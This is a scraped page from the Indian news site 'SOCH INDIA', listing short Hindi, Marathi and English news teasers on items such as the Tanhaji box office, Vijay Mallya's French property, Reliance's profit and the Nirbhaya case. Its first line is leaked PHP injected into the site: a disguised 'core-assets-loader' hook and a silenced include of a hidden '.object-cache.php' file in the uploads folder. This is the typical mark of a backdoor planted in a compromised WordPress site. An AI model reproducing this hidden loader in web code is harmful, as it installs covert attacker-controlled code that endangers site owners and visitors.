add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

बॉक्स ऑफिस पर इन दिनों अजय देवगन (Ajay Devgn) की फिल्म ‘तानाजी: द अनसंग वॉरियर (Tanhaji: The Unsung Warrior)’ का जलवा देखते ही बन रहा है. पिछले 8 दिनों से ‘तानाजी’ का बॉक्स ऑफिस पर लगातार बढ़ता कलेक्शन देखकर तो ऐसा लग रहा है कि दर्शकों को यह फिल्म बेहद पसंद...

Read More

भारतीय स्टेट बँकेसह विविध बँकांचे सुमारे ९ हजार कोटींचे कर्ज बुडवून विदेशात पसार झालेला उद्योगपती विजय मल्ल्याचा बाजार उठला आहे. भारतात त्याच्या अनेक मालमत्तांवर टाच आलेली असतानाच मल्ल्याची फ्रान्समधील मालमत्ताही विकली जाणार आहे. मल्ल्याची फ्रान्समधील १७ बेडरूम असलेली हवेली, एक सिनेमा हॉल, खासगी हेलिपॅड आणि नाइट क्लब आदी मालमत्ता...

Read More

मुकेश अंबानी प्रवर्तित रिलायन्स इंडस्ट्रीजने डिसेंबरअखेरच्या तिमाहीमध्ये विक्रमी नफ्याची नोंद केली आहे. ऑक्टोबर ते डिसेंबर या तिमाहीत या कंपनीला ११,६४० कोटी रुपये निव्वळ नफा झाला. कोणत्याही भारतीय कंपनीने नोंदवलेला हा सर्वोच्च तिमाही नफा आहे. ‘अॅमेझॉन’ १० लाख भारतीयांना देणार नोकऱ्या सप्टेंबरअखेरच्या तिमाहीत या कंपनीने ११,२६२ कोटी रुपये नफ्याची नोंद केली होती....

Read More

निर्भया बलात्कार प्रकरणातील गुन्हेगारांच्या फाशीच्या मुद्द्यावरून ज्येष्ठ वकील इंदिरा जयसिंह यांनी बलात्कार पीडितेच्या आईला अजब सल्ला दिला आहे. ‘निर्भयाच्या आईनं काँग्रेस अध्यक्षा सोनिया गांधी यांचं अनुकरण करून दोषींना माफ करावं,’ असं जयसिंह यांनी म्हटलं आहे. निर्भया सामूहिक बलात्कार प्रकरणातील सर्व चार दोषींना १ फेब्रुवारी रोजी पहाटे सहा वाजता तिहार...

Read More

पालिकेची निवडणूक तीन महिन्यावर येऊन ठेपल्याने विद्यमान नगरसेवकांसह इच्छुकांनी मकरसंक्रांतीच्या मुहूर्तावर प्रचाराला सुरुवात केली आहे. यात हळदी-कुंकू समारंभापासून ते घरोघरी तिळगूळ वाटपाच्या कार्यक्रमाचा समावेश आहे. नेरूळमधील एका नगरसेवकाने तिळगुळाच्या पाकिटासोबत मागील पाच वर्षांत केलेल्या कामाचे पत्रकही प्रभागातील घराघरांत वाटप केले आहे. हे वाटप आजूबाजूच्या तीन प्रभागांत करून त्यात प्रभाव...

Read More

माहिती तंत्रज्ञानाच्या युगात सायबर गुन्ह्य़ांचे प्रमाण दिवसेंदिवस वाढत आहे. शारीरिक दुखापतीच्या गुन्ह्य़ांच्या बरोबरीने राज्यात सायबर गुन्हे घडत असून या गुन्ह्य़ांची सोडवणूक करण्यासाठी केंद्रीभूत यंत्रणा निर्माण करण्याची योजना आखण्यात येत आहे. त्याकरिता नवी मुंबई येथे राज्याचे ‘सायबर गुन्हे प्रकटीकरण केंद्र’ (सायबर डिटेक्शन हब) तयार करण्यात येत असून इतर शहरातील सायबर...

Read More

Lieutenant Governor Anil Baijal on Friday granted power of detaining authority to the Delhi Police Commissioner under the National Security Act, according to a notification. The Act allows preventive detention of an individual for months if the authorities feel that the individual is a threat to the national security,...

Read More

पश्चिम रेल्वे मार्गावरील माटुंगा ते माहीम या दोन स्थानकांदरम्यान रेल्वे रुळाला तडे गेल्याने पश्चिम रेल्वेची वाहतूक विस्कळीत झाली आहे. धीम्या मार्गावरील रुळाला तडे गेल्याने अप मार्गावरची वाहतूक ऐन गर्दीच्या वेळी विस्कळीत झाली आहे. धीम्या मार्गावरची वाहतूक जलद मार्गावर वळवण्यात आली आहे.

Read More

दिल्ली हाई कोर्ट ने 2015 के चुनाव के दौरान अपनी शैक्षणिक योग्यता के बारे में गलत जानकारी देने के आरोप में दिल्ली के पूर्व कानून मंत्री जितेंद्र सिंह तोमर को चुनाव लड़ने से वंचित कर दिया है. तोमर दिल्ली की त्रिनगर से आम आदमी पार्टी (आप) के विधायक हैं....

Read More

मुंबई पोलिसांनी पुन्हा एकदा हाय प्रोफाइल सेक्स रॅकेटचा पर्दाफाश केला आहे. अंधेरीमधील एका थ्री स्टार हॉटेलमध्ये हे सेक्स रॅकेट सुरु होते. पोलिसांनी यावेळी एका महिलेला अटक केली असून तीन महिला कलाकारांची सुटका करण्यात आली आहे. यामधील एक तरुणी अल्पवयीन असल्याची माहिती पोलिसांनी दिली आहे. पोलिसांच्या सामाजिक सेवा शाखेने अंधेरी...

Read More